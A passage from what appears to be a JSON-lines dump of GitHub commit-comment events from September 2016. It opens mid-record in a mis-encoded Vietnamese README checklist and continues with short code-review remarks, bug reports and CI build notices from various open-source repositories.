thá»ƒ block ngÆ°á»i khÃ¡c. Sau khi block, ngÆ°á»i dÃ¹ng sáº½ khÃ´ng nháº­n Ä‘Æ°á»£c tin nháº¯n tá»« ngÆ°á»i bá»‹ block gá»­i ná»¯a.\r\n* [ ] NgÆ°á»i dÃ¹ng cÃ³ thá»ƒ xÃ³a ngÆ°á»i dÃ¹ng khÃ¡c ra khá»i danh sÃ¡ch báº¡n.\r\n* [ ] NgÆ°á»i dÃ¹ng cÃ³ thá»ƒ unblock ngÆ°á»i dÃ¹ng khÃ¡c.\r\n* [ ] Khi ngÆ°á»i dÃ¹ng kÃ©o xuá»‘ng cuá»‘i trang, cÃ¡c tin nháº¯n tiáº¿p theo sáº½ tá»± Ä‘á»™ng hiá»ƒn thá»‹ hoáº·c cÃ³ nÃºt nháº¥n \"Xem thÃªm tin nháº¯n\" Ä‘á»ƒ náº¡p thÃªm danh sÃ¡ch tin nháº¯n.\r\n* [ ] NgÆ°á»i dÃ¹ng sáº½ nháº­n Ä‘Æ°á»£c email thÃ´ng bÃ¡o khi há» nháº­n Ä‘Æ°á»£c tin nháº¯n cÃ¹ng vá»›i link Ä‘á»ƒ xem tin nháº¯n.\r\n* [ ] NgÆ°á»i dÃ¹ng sáº½ nháº­n Ä‘Æ°á»£c email khi ngÆ°á»i nháº­n Ä‘Ã£ Ä‘á»c tin nháº¯n.\r\n* [ ] NgÆ°á»i dÃ¹ng cÃ³ thá»ƒ gá»­i tin nháº¯n cho ngÆ°á»i dÃ¹ng ngoÃ i há»‡ thá»‘ng. Khi Ä‘Ã³, ngÆ°á»i nháº­n sáº½ nháº­n Ä‘Æ°á»£c 1 email chá»©a link Ä‘Äƒng kÃ½ tÃ i khoáº£n. Sau khi Ä‘Äƒng kÃ½ tÃ i khoáº£n, há» cÃ³ thá»ƒ xem tin nháº¯n Ä‘Ã£ nháº­n.\r\n\r\nDanh sÃ¡ch chá»©c nÄƒng **phá»¥** Ä‘Ã£ lÃ m nhÆ°ng khÃ´ng Ä‘Æ°á»£c liá»‡t kÃª á»Ÿ trÃªn:\r\n\r\nCÃ¡c chuáº©n Ä‘áº§u ra cáº§n thá»±c hiá»‡n:\r\n* [ ] Git vá»›i Centralize Workflow\r\n* [ ] Git theo Feature Branch Workflow\r\n* [ ] Git theo Feature Branch Workflow cÃ³ Pull Request\r\n* [ ] Git theo Gitflow Workflow\r\n## Video Walkthrough\r\n\r\nHere's a walkthrough of implemented user stories:\r\n\r\n![Video Walkthrough](relative-path-to-your-gif-file-on-github-or-absolute-path-to-file-on-imgur-or-youtube)\r\n\r\nGIF created with [LiceCap](http://www.cockos.com/licecap/).\r\n\r\n## Notes\r\n\r\nDescribe any challenges encountered while building the app.\r\n\r\n## License\r\n\r\n    Copyright [yyyy] [name of copyright owner]\r\n\r\n    Licensed under the Apache License, Version 2.0 (the \"License\");\r\n    you may not use this file except in compliance with the License.\r\n    You may obtain a copy of the License at\r\n\r\n        http://www.apache.org/licenses/LICENSE-2.0\r\n\r\n    Unless required by applicable law or agreed to in writing, software\r\n    distributed under the License is distributed on an \"AS IS\" BASIS,\r\n    WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n    See the License for the specific language governing permissions and\r\n    limitations under the License."}},"created_at":"2016-09-27T13:36:32Z"}
{"id":"4624224056","type":"CommitCommentEvent","actor":{"login":"peppy"},"repo":{"name":"peppy/osu-framework"},"payload":{"comment":{"id":19190676,"position":25,"line":67,"path":"osu.Framework/IO/Stores/GlyphStore.cs","commit_id":"f3b1a4be3160074baaf3ae094df723b890f0fea1","created_at":"2016-09-27T13:36:47Z","updated_at":"2016-09-27T13:36:47Z","body":"you're double-initialising pixels doing it this way, though."}},"created_at":"2016-09-27T13:36:47Z"}
{"id":"4624224626","type":"CommitCommentEvent","actor":{"login":"0850210502"},"repo":{"name":"googledrive/zipextractor"},"payload":{"comment":{"id":19190677,"position":null,"line":null,"path":null,"commit_id":"7d8f03688d4b55441e14f9a13cc52682558fa441","created_at":"2016-09-27T13:36:51Z","updated_at":"2016-09-27T13:36:51Z","body":"![s__5931023](https://cloud.githubusercontent.com/assets/21083600/18875918/e2cb97ce-84f1-11e6-9b57-4e51ac8bf012.jpg)\r\n![s__5931032](https://cloud.githubusercontent.com/assets/21083600/18875946/017a08f4-84f2-11e6-811c-d26f59661abb.jpg)\r\n"}},"created_at":"2016-09-27T13:36:51Z"}
{"id":"4624227570","type":"CommitCommentEvent","actor":{"login":"QQ853695231"},"repo":{"name":"QQ853695231/IPPlugin"},"payload":{"comment":{"id":19190686,"position":null,"line":null,"path":null,"commit_id":"25ca210d9718f33dfc2c52d2336e59eec6c6c539","created_at":"2016-09-27T13:37:09Z","updated_at":"2016-09-27T13:37:09Z","body":"这个插件主要是用于生成IP地址对应的4个input标签，并可以利用通过初始化插件返回的对象来获取当前对象所对应的ip值，并可以动态的改变ip地址！"}},"created_at":"2016-09-27T13:37:09Z"}
{"id":"4624228218","type":"CommitCommentEvent","actor":{"login":"afri18"},"repo":{"name":"eddieridwan/OpenSID"},"payload":{"comment":{"id":19190691,"position":null,"line":null,"path":null,"commit_id":"a2149c920690d8ed1df18db75115ef2d53787884","created_at":"2016-09-27T13:37:12Z","updated_at":"2016-09-27T13:37:12Z","body":"satu keluarga bisa mendapatkan lebih satu bantuan bung, contoh : Kartu Keluarga Sejahtera, Bedah Rumah\r\nKadang di suatu kabupaten ada program juga untuk keluarga"}},"created_at":"2016-09-27T13:37:12Z"}
{"id":"4624233869","type":"CommitCommentEvent","actor":{"login":"berryelectronics"},"repo":{"name":"MarshallOfSound/Google-Play-Music-Desktop-Player-UNOFFICIAL-"},"payload":{"comment":{"id":19190700,"position":null,"line":null,"path":null,"commit_id":"944c3f89635f26ab4ef693fca32cdb1f1e2fd13f","created_at":"2016-09-27T13:37:42Z","updated_at":"2016-09-27T13:37:42Z","body":"Maybe keep the program ico and generate the tray icons? Doubt that one icon\nwill make the repos size much bigger.\n\nSamuel Attard <notifications@github.com> schrieb am Di., 27. Sep. 2016,\n12:03:\n\n> @berryelectronics <https://github.com/berryelectronics> RIP\n>\n> As @felixrieseberg <https://github.com/felixrieseberg> once said:\n>\n> Every single time we do something by hand, a pony dies\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/MarshallOfSound/Google-Play-Music-Desktop-Player-UNOFFICIAL-/commit/944c3f89635f26ab4ef693fca32cdb1f1e2fd13f#commitcomment-19187872>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AMCBvCWTL4LqSIlotdOEtMBvGun3cyWJks5quOntgaJpZM4KHM1e>\n> .\n>\n-- \nMatjas\n"}},"created_at":"2016-09-27T13:37:42Z"}
{"id":"4624234841","type":"CommitCommentEvent","actor":{"login":"SirCmpwn"},"repo":{"name":"peppy/osu-framework"},"payload":{"comment":{"id":19190701,"position":25,"line":67,"path":"osu.Framework/IO/Stores/GlyphStore.cs","commit_id":"f3b1a4be3160074baaf3ae094df723b890f0fea1","created_at":"2016-09-27T13:37:47Z","updated_at":"2016-09-27T13:37:47Z","body":"I suppose it could be done in one loop."}},"created_at":"2016-09-27T13:37:47Z"}
{"id":"4624235076","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":19190702,"position":null,"line":null,"path":null,"commit_id":"6b1ae0448004bea94154ac6a489afffb4045adc2","created_at":"2016-09-27T13:37:49Z","updated_at":"2016-09-27T13:37:49Z","body":"fast-forwarding develop-2.2 to borshop-integration-1487-dr-fix-bad-pattern-match = a7ca9045"}},"created_at":"2016-09-27T13:37:49Z"}
{"id":"4624235662","type":"CommitCommentEvent","actor":{"login":"brussee"},"repo":{"name":"csrdelft/csrdelft.nl"},"payload":{"comment":{"id":19190703,"position":null,"line":null,"path":null,"commit_id":"5828a74a313379f129440f08945f3cb9498c864f","created_at":"2016-09-27T13:37:52Z","updated_at":"2016-09-27T13:37:52Z","body":"AuthenticationMethod::url_token bestaat wel? Bedoel je dat er een require_once '' ergens mist?"}},"created_at":"2016-09-27T13:37:52Z"}
{"id":"4624237959","type":"CommitCommentEvent","actor":{"login":"sev-"},"repo":{"name":"scummvm/scummvm"},"payload":{"comment":{"id":19190706,"position":15,"line":306,"path":"backends/platform/dc/vmsave.cpp","commit_id":"418eec8c09ab2a19a8c183388953b587afe0349e","created_at":"2016-09-27T13:38:08Z","updated_at":"2016-09-27T13:38:08Z","body":"Sure, please drop by IRC for obtaining the access."}},"created_at":"2016-09-27T13:38:08Z"}
{"id":"4624243063","type":"CommitCommentEvent","actor":{"login":"brussee"},"repo":{"name":"csrdelft/csrdelft.nl"},"payload":{"comment":{"id":19190713,"position":null,"line":null,"path":null,"commit_id":"5828a74a313379f129440f08945f3cb9498c864f","created_at":"2016-09-27T13:38:52Z","updated_at":"2016-09-27T13:38:52Z","body":"Doh! het is een typo: AuthenticationMethod::url_token"}},"created_at":"2016-09-27T13:38:52Z"}
{"id":"4624243323","type":"CommitCommentEvent","actor":{"login":"oscsx"},"repo":{"name":"OutSystems/Cordova-sqlite-storage"},"payload":{"comment":{"id":19190714,"position":null,"line":null,"path":null,"commit_id":"92e45cbcbc7a3ac1de22e905be2fbdabaea75226","created_at":"2016-09-27T13:38:55Z","updated_at":"2016-09-27T13:38:55Z","body":"version bump to os.3"}},"created_at":"2016-09-27T13:38:55Z"}
{"id":"4624243431","type":"CommitCommentEvent","actor":{"login":"petroyurchyshyn"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19190715,"position":5,"line":5,"path":"language-project/dao/.settings/org.eclipse.wst.common.project.facet.core.xml","commit_id":"d42290f4bf4989fcf929d06843b604e4cdfe4a4c","created_at":"2016-09-27T13:38:56Z","updated_at":"2016-09-27T13:38:56Z","body":"продублируй пожалуйста. мог упустить"}},"created_at":"2016-09-27T13:38:56Z"}
{"id":"4624248227","type":"CommitCommentEvent","actor":{"login":"markpollack"},"repo":{"name":"ilayaperumalg/spring-cloud-deployer"},"payload":{"comment":{"id":19190721,"position":14,"line":74,"path":"spring-cloud-deployer-local/src/main/java/org/springframework/cloud/deployer/spi/local/LocalDeployerProperties.java","commit_id":"182ded9874f436389d3c538efccbd473dc1e2344","created_at":"2016-09-27T13:39:43Z","updated_at":"2016-09-27T13:39:43Z","body":"Should this be singular instead - setWorkingDirectoryRoot?"}},"created_at":"2016-09-27T13:39:43Z"}
{"id":"4624249281","type":"CommitCommentEvent","actor":{"login":"Zidane"},"repo":{"name":"SpongePowered/SpongeAPI"},"payload":{"comment":{"id":19190728,"position":16,"line":50,"path":"src/main/java/org/spongepowered/api/world/extent/InteractableVolume.java","commit_id":"9368eed75e18c3b23eb5c26f91b9a958c841fd18","created_at":"2016-09-27T13:39:54Z","updated_at":"2016-09-27T13:39:54Z","body":"Should only be needed in the Cause stack."}},"created_at":"2016-09-27T13:39:54Z"}
{"id":"4624251683","type":"CommitCommentEvent","actor":{"login":"phiw13"},"repo":{"name":"philwareham/textpattern-hive-admin-theme"},"payload":{"comment":{"id":19190739,"position":4,"line":3050,"path":"dist/hive/assets/css/textpattern.css","commit_id":"6e0c6dbeb2917ffd7415ca210c130a0150bd80e2","created_at":"2016-09-27T13:40:20Z","updated_at":"2016-09-27T13:40:20Z","body":"For this to work, you need to specify `.multi_edit_form { position: relative}` to provide a hook for the element to stick to.\r\n`.multi_edit_form` is the closest container available.\r\n\r\n"}},"created_at":"2016-09-27T13:40:20Z"}
{"id":"4624252045","type":"CommitCommentEvent","actor":{"login":"andela-oeyiowuawi"},"repo":{"name":"andela-tpeters/peictt"},"payload":{"comment":{"id":19190741,"position":20,"line":26,"path":"lib/peictt.rb","commit_id":"d9eb76fc5188a69072d049fd60aad459fa3a328b","created_at":"2016-09-27T13:40:24Z","updated_at":"2016-09-27T13:40:24Z","body":"why are you returning 500 here?"}},"created_at":"2016-09-27T13:40:24Z"}
{"id":"4624252461","type":"CommitCommentEvent","actor":{"login":"Jonatams"},"repo":{"name":"ArtezGDA/Pioneers"},"payload":{"comment":{"id":19190743,"position":null,"line":null,"path":null,"commit_id":"b38975e2a2acc8d5fd6523844ff6145dbc87737c","created_at":"2016-09-27T13:40:28Z","updated_at":"2016-09-27T13:40:28Z","body":"wat copier jij van Anne?"}},"created_at":"2016-09-27T13:40:28Z"}
{"id":"4624253260","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19190749,"position":null,"line":null,"path":null,"commit_id":"87ccbf218d5e94439826f3d5fadff9b7d9fe499f","created_at":"2016-09-27T13:40:36Z","updated_at":"2016-09-27T13:40:36Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1175](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14338&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 260, ignored: 3 Build time: 00:09:59"}},"created_at":"2016-09-27T13:40:36Z"}
{"id":"4624254362","type":"CommitCommentEvent","actor":{"login":"jose8007"},"repo":{"name":"jose8007/aplicacion"},"payload":{"comment":{"id":19190751,"position":null,"line":null,"path":null,"commit_id":"6cc60aa3a7093cb99a645ba9b4a3c9998f90ce52","created_at":"2016-09-27T13:40:47Z","updated_at":"2016-09-27T13:40:47Z","body":"subir imagenes"}},"created_at":"2016-09-27T13:40:47Z"}
{"id":"4624255034","type":"CommitCommentEvent","actor":{"login":"fg78nc"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19190754,"position":25,"line":25,"path":"language-project/dao/src/main/java/com/language/daoImpl/Test.java","commit_id":"d42290f4bf4989fcf929d06843b604e4cdfe4a4c","created_at":"2016-09-27T13:40:53Z","updated_at":"2016-09-27T13:40:53Z","body":"Это для testing, не для production"}},"created_at":"2016-09-27T13:40:53Z"}
{"id":"4624255696","type":"CommitCommentEvent","actor":{"login":"asterite"},"repo":{"name":"crystal-lang/crystal"},"payload":{"comment":{"id":19190756,"position":4,"line":135,"path":"spec/std/yaml/serialization_spec.cr","commit_id":"20aa5d3a92eaa860bec3e6fdda672ad55a7c831a","created_at":"2016-09-27T13:40:59Z","updated_at":"2016-09-27T13:40:59Z","body":"Yes, I'm a typo champion 😊 "}},"created_at":"2016-09-27T13:40:59Z"}
{"id":"4624256300","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"oe-alliance/e2openplugin-OpenWebif"},"payload":{"comment":{"id":19190759,"position":null,"line":null,"path":null,"commit_id":"dea83dbd376f22d2eff4c844392cc9301e3fb98e","created_at":"2016-09-27T13:41:04Z","updated_at":"2016-09-27T13:41:04Z","body":"Actually I can't even get enigma2 to work with the transcoded streams of my Duo² at all.\r\nVLC can stream fine, but E2 just fools around:\r\n15:36:24.076 [   ] dvb/epgcache.cpp:1734 abortNonAvail [EPGC] abort non avail nownext reading\r\n15:36:24.076 [   ] dvb/epgcache.cpp:1741 abortNonAvail [EPGC] abort non avail schedule reading\r\n15:36:24.077 [   ] dvb/epgcache.cpp:1748 abortNonAvail [EPGC] abort non avail schedule other reading\r\n15:36:24.077 [   ] dvb/epgcache.cpp:1772 abortNonAvail [EPGC] abort non avail netmed schedule reading\r\n15:36:24.078 [   ] dvb/epgcache.cpp:1779 abortNonAvail [EPGC] abort non avail netmed schedule other reading\r\n15:36:24.078 [   ] dvb/epgcache.cpp:1788 abortNonAvail [EPGC] abort non avail FreeSat schedule_other reading\r\n15:36:24.079 [   ] dvb/epgcache.cpp:1799 abortNonAvail [EPGC] abort non avail viasat reading\r\n15:36:26.181 [ E ] base/cfile.h:17 CFile error http://user:pass@duo2:8001/1:0:19:EF10:421:1:C00000:0:0:0.meta [No such file or directory]\r\n15:36:26.181 [ E ] base/cfile.h:17 CFile error http://user:pass@duo2:8001/recordings.epl [No such file or directory]\r\n15:36:26.181 [ E ] base/cfile.h:17 CFile error http://user:pass@duo2:8001/1:0:19:EF15:421:1:C00000:0:0:0.meta [No such file or directory]\r\n15:36:26.181 [ E ] base/cfile.h:17 CFile error http://user:pass@duo2:8001/recordings.epl [No such file or directory]\r\n\r\nI've tried about everything, even moving the transstreamproxy to port 8001 instead of 8002.\r\nStreaming works, transcoding doesn't."}},"created_at":"2016-09-27T13:41:04Z"}
{"id":"4624258616","type":"CommitCommentEvent","actor":{"login":"jjallaire"},"repo":{"name":"rstudio/rmarkdown"},"payload":{"comment":{"id":19190763,"position":null,"line":null,"path":null,"commit_id":"707cbc92a0e5e9cc4f0b81453916394f4fbe70c2","created_at":"2016-09-27T13:41:27Z","updated_at":"2016-09-27T13:41:27Z","body":"Done\n\nOn Tue, Sep 27, 2016 at 9:25 AM, Hadley Wickham <notifications@github.com>\nwrote:\n\n> Would you mind bumping the minor version too? Just so I have something to\n> check for\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/rstudio/rmarkdown/commit/707cbc92a0e5e9cc4f0b81453916394f4fbe70c2#commitcomment-19190492>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAGXxyiJ9IAkRRIv6uiID3Rp1LycL1g9ks5quRlPgaJpZM4KHjox>\n> .\n>\n"}},"created_at":"2016-09-27T13:41:27Z"}
{"id":"4624258738","type":"CommitCommentEvent","actor":{"login":"ilayaperumalg"},"repo":{"name":"ilayaperumalg/spring-cloud-deployer"},"payload":{"comment":{"id":19190764,"position":14,"line":74,"path":"spring-cloud-deployer-local/src/main/java/org/springframework/cloud/deployer/spi/local/LocalDeployerProperties.java","commit_id":"182ded9874f436389d3c538efccbd473dc1e2344","created_at":"2016-09-27T13:41:29Z","updated_at":"2016-09-27T13:41:29Z","body":"I thought it was plural by purpose as it handles multiple directories inside the Root that is set here. what do you think?"}},"created_at":"2016-09-27T13:41:29Z"}
{"id":"4624262218","type":"CommitCommentEvent","actor":{"login":"romanowski"},"repo":{"name":"eed3si9n/zinc"},"payload":{"comment":{"id":19190775,"position":37,"line":218,"path":"internal/zinc-core/src/main/scala/sbt/internal/inc/IncrementalCommon.scala","commit_id":"886bae90e33c4a35b244b41a29c7a4a8a78eead3","created_at":"2016-09-27T13:42:03Z","updated_at":"2016-09-27T13:42:03Z","body":"I don't think this is safe. We've got 2 project A (there is shadowed class Foo), B that was compiled nad are not related (so far). Then we make change in B so last compilation time from B > compilaiton time from A.\r\nThen we make B depends on A. Correct me if I am wrong but this will not make Foo as shadowed.\r\n\r\nIt does not take classpath order into accout so we might get a lot of false positives."}},"created_at":"2016-09-27T13:42:03Z"}
{"id":"4624267230","type":"CommitCommentEvent","actor":{"login":"mattheworiordan"},"repo":{"name":"ably/tutorials"},"payload":{"comment":{"id":19190788,"position":9,"line":9,"path":"index.php","commit_id":"5f96f5f32e226fdafd4e4c42e3b651520ee65620","created_at":"2016-09-27T13:42:51Z","updated_at":"2016-09-27T13:42:51Z","body":"encoding issue"}},"created_at":"2016-09-27T13:42:51Z"}
{"id":"4624268814","type":"CommitCommentEvent","actor":{"login":"fg78nc"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19190792,"position":30,"line":30,"path":"language-project/web/src/main/java/language/servlet/HomeController.java","commit_id":"d42290f4bf4989fcf929d06843b604e4cdfe4a4c","created_at":"2016-09-27T13:43:06Z","updated_at":"2016-09-27T13:43:06Z","body":"Драйвер загружается для Servlet. "}},"created_at":"2016-09-27T13:43:06Z"}
{"id":"4624268831","type":"CommitCommentEvent","actor":{"login":"LEGOlord208"},"repo":{"name":"LEGOlord208/PixelCamMod"},"payload":{"comment":{"id":19190793,"position":null,"line":null,"path":null,"commit_id":"4eaeaf263630d1d20951380439efca58a1cbe3d2","created_at":"2016-09-27T13:43:06Z","updated_at":"2016-09-27T13:43:06Z","body":"Not sure if I am talking about the same \"Jerking\" as you, but it can be the server's movement check. Either go close enough to the first point, or /cam goto 1 with my new fix for vanilla servers. (If not close enough, call the teleport command.)\r\n\r\nI might be completely stupid and talking about another thing here. Not sure :)"}},"created_at":"2016-09-27T13:43:06Z"}
{"id":"4624272345","type":"CommitCommentEvent","actor":{"login":"fg78nc"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19190802,"position":48,"line":48,"path":"language-project/web/src/main/java/language/servlet/RegistrationController.java","commit_id":"d42290f4bf4989fcf929d06843b604e4cdfe4a4c","created_at":"2016-09-27T13:43:40Z","updated_at":"2016-09-27T13:43:40Z","body":"Я не вижу лучшего решения - дайте свое предложение."}},"created_at":"2016-09-27T13:43:40Z"}
{"id":"4624275691","type":"CommitCommentEvent","actor":{"login":"Zidane"},"repo":{"name":"SpongePowered/SpongeAPI"},"payload":{"comment":{"id":19190810,"position":62,"line":77,"path":"src/main/java/org/spongepowered/api/event/cause/Cause.java","commit_id":"9368eed75e18c3b23eb5c26f91b9a958c841fd18","created_at":"2016-09-27T13:44:12Z","updated_at":"2016-09-27T13:44:12Z","body":"Slept on this and having Context first really seems dirty..."}},"created_at":"2016-09-27T13:44:12Z"}
{"id":"4624276453","type":"CommitCommentEvent","actor":{"login":"amihaiemil"},"repo":{"name":"amihaiemil/oink"},"payload":{"comment":{"id":19190813,"position":27,"line":119,"path":"service/src/main/java/org/pig/oink/operation/impl/PigJobServerImpl.java","commit_id":"beff11e5308ec3a29e12970942eb8056e08746bf","created_at":"2016-09-27T13:44:20Z","updated_at":"2016-09-27T13:44:20Z","body":"Here I changed ``IllegalArgumentException`` to ``IllegalStateException`` since it's more appropriate (the argument is fine, the state of the server - the file is already uploaded is what's wrong). \r\n\r\nAlso, it leverages handling, since this one is caught in ``IllegalStateMapper``. If this sitiuation was also caught by ``IllegalArgumentMapper`` then there would have been a more complicated code, to decide when to respond with 404 and when with 409"}},"created_at":"2016-09-27T13:44:20Z"}
{"id":"4624277109","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19190816,"position":null,"line":null,"path":null,"commit_id":"8a9c9301641ad25c9311ddfa3f1297d7c3b17775","created_at":"2016-09-27T13:44:26Z","updated_at":"2016-09-27T13:44:26Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1176](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14340&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-27T13:44:26Z"}
{"id":"4624277736","type":"CommitCommentEvent","actor":{"login":"m-kuhn"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19190817,"position":11,"line":7,"path":"ci/travis/linux/before_install.sh","commit_id":"9c32fcc153f2da071aaaa19d5abfab517a548076","created_at":"2016-09-27T13:44:33Z","updated_at":"2016-09-27T13:44:33Z","body":"I can assign some server files to you in return if you like ;)"}},"created_at":"2016-09-27T13:44:33Z"}
{"id":"4624278780","type":"CommitCommentEvent","actor":{"login":"brussee"},"repo":{"name":"csrdelft/csrdelft.nl"},"payload":{"comment":{"id":19190820,"position":null,"line":null,"path":null,"commit_id":"5828a74a313379f129440f08945f3cb9498c864f","created_at":"2016-09-27T13:44:44Z","updated_at":"2016-09-27T13:44:44Z","body":"PR #133 lost o.a. dit probleem op."}},"created_at":"2016-09-27T13:44:44Z"}
{"id":"4624283392","type":"CommitCommentEvent","actor":{"login":"alban"},"repo":{"name":"kinvolk/scope-http-requests"},"payload":{"comment":{"id":19190829,"position":19,"line":17,"path":"README.md","commit_id":"45fc3328553944a9533caad7c24289c06817d3ea","created_at":"2016-09-27T13:45:27Z","updated_at":"2016-09-27T13:45:27Z","body":"missing make command to run the plugin?"}},"created_at":"2016-09-27T13:45:27Z"}
{"id":"4624284382","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19190832,"position":null,"line":null,"path":null,"commit_id":"8a9c9301641ad25c9311ddfa3f1297d7c3b17775","created_at":"2016-09-27T13:45:36Z","updated_at":"2016-09-27T13:45:36Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1176](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14340&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Exit code 1 (new) Build time: 00:01:10"}},"created_at":"2016-09-27T13:45:36Z"}
{"id":"4624284438","type":"CommitCommentEvent","actor":{"login":"mattheworiordan"},"repo":{"name":"ably/tutorials"},"payload":{"comment":{"id":19190834,"position":3,"line":3,"path":"ably.php","commit_id":"5f96f5f32e226fdafd4e4c42e3b651520ee65620","created_at":"2016-09-27T13:45:37Z","updated_at":"2016-09-27T13:45:37Z","body":"I would really prefer if this pattern simply checked if the API key was not set i.e. something like https://github.com/ably/tutorials/commit/e3ecbaf#diff-686962b2edaf557288e68a71242cc589R22 or https://github.com/ably/tutorials/commit/0ec2c7eee002923b9282017830284c76efafc09f#diff-d43519ff9d6b8fdcc79a75b6c1de5782R4.  This makes it far easier for the user to just insert the key in one line and run it again without having to figure out that they need to remove this line. For example, if the user added their API after receiving an \"Insert your API key\" error, then when they run it again it will say \"Insert your API key\" still when they have already."}},"created_at":"2016-09-27T13:45:37Z"}
{"id":"4624288055","type":"CommitCommentEvent","actor":{"login":"Zidane"},"repo":{"name":"SpongePowered/SpongeAPI"},"payload":{"comment":{"id":19190852,"position":42,"line":42,"path":"src/main/java/org/spongepowered/api/event/cause/EventContext.java","commit_id":"9368eed75e18c3b23eb5c26f91b9a958c841fd18","created_at":"2016-09-27T13:46:12Z","updated_at":"2016-09-27T13:46:12Z","body":"Maybe these should be able to be queried through the GameRegistry, much like Keys are. If not, some better struct than randomly thrown on the Context interface."}},"created_at":"2016-09-27T13:46:12Z"}
{"id":"4624289695","type":"CommitCommentEvent","actor":{"login":"wondie"},"repo":{"name":"gltn/stdm"},"payload":{"comment":{"id":19190856,"position":null,"line":null,"path":null,"commit_id":"3927828dcfd5fcb747e2f5eaf46b53c244b0eca9","created_at":"2016-09-27T13:46:29Z","updated_at":"2016-09-27T13:46:29Z","body":"@gkahiu that is well noted and I have incorporated your suggestion in[ this comment. ](https://github.com/gltn/stdm/commit/a3dad21d91019704089b357b5626c691089429e2)"}},"created_at":"2016-09-27T13:46:29Z"}
{"id":"4624291307","type":"CommitCommentEvent","actor":{"login":"habeIchVergessen"},"repo":{"name":"RFD-FHEM/RFFHEM"},"payload":{"comment":{"id":19190860,"position":14,"line":87,"path":"FHEM/00_SIGNALduino.pm","commit_id":"4aaac4b0b84d3e50b68e63524d3c6948c4b613f5","created_at":"2016-09-27T13:46:44Z","updated_at":"2016-09-27T13:46:44Z","body":"nein kein Fehler. sieht halt ungewöhnlich aus."}},"created_at":"2016-09-27T13:46:44Z"}
{"id":"4624291371","type":"CommitCommentEvent","actor":{"login":"Zidane"},"repo":{"name":"SpongePowered/SpongeAPI"},"payload":{"comment":{"id":19190861,"position":117,"line":117,"path":"src/main/java/org/spongepowered/api/event/cause/EventContext.java","commit_id":"9368eed75e18c3b23eb5c26f91b9a958c841fd18","created_at":"2016-09-27T13:46:45Z","updated_at":"2016-09-27T13:46:45Z","body":"new HashMap<>()"}},"created_at":"2016-09-27T13:46:45Z"}
{"id":"4624293273","type":"CommitCommentEvent","actor":{"login":"KohliDev"},"repo":{"name":"vmware/liota"},"payload":{"comment":{"id":19190866,"position":15,"line":43,"path":"liota/lib/transports/web_socket.py","commit_id":"edbf61b476c1f0a6fbae4fa7dd1f9c527b129d23","created_at":"2016-09-27T13:47:04Z","updated_at":"2016-09-27T13:47:04Z","body":"No problem :-)"}},"created_at":"2016-09-27T13:47:04Z"}
{"id":"4624294872","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"SarahYuHanCheng/phonebook"},"payload":{"comment":{"id":19190868,"position":null,"line":null,"path":null,"commit_id":"b69e24b46767ddaff48020eea11f729855bd781a","created_at":"2016-09-27T13:47:21Z","updated_at":"2016-09-27T13:47:21Z","body":"You have to write down meaningful GIT commit messages! Read the article carefully: http://chris.beams.io/posts/git-commit/"}},"created_at":"2016-09-27T13:47:21Z"}
{"id":"4624299077","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"SarahYuHanCheng/phonebook"},"payload":{"comment":{"id":19190882,"position":15,"line":19,"path":"phonebook_opt.c","commit_id":"b69e24b46767ddaff48020eea11f729855bd781a","created_at":"2016-09-27T13:48:04Z","updated_at":"2016-09-27T13:48:04Z","body":"Don't leave the extra blank line. Follow the consistent coding style."}},"created_at":"2016-09-27T13:48:04Z"}
{"id":"4624300532","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"SarahYuHanCheng/phonebook"},"payload":{"comment":{"id":19190886,"position":4,"line":9,"path":"phonebook_opt.c","commit_id":"b69e24b46767ddaff48020eea11f729855bd781a","created_at":"2016-09-27T13:48:18Z","updated_at":"2016-09-27T13:48:18Z","body":"Fix the coding style!"}},"created_at":"2016-09-27T13:48:18Z"}
{"id":"4624301623","type":"CommitCommentEvent","actor":{"login":"Zidane"},"repo":{"name":"SpongePowered/SpongeAPI"},"payload":{"comment":{"id":19190889,"position":25,"line":79,"path":"src/main/java/org/spongepowered/api/service/SimpleServiceManager.java","commit_id":"9368eed75e18c3b23eb5c26f91b9a958c841fd18","created_at":"2016-09-27T13:48:28Z","updated_at":"2016-09-27T13:48:28Z","body":"See above about these \"ContextKeys\". Really need to consolidate this."}},"created_at":"2016-09-27T13:48:28Z"}
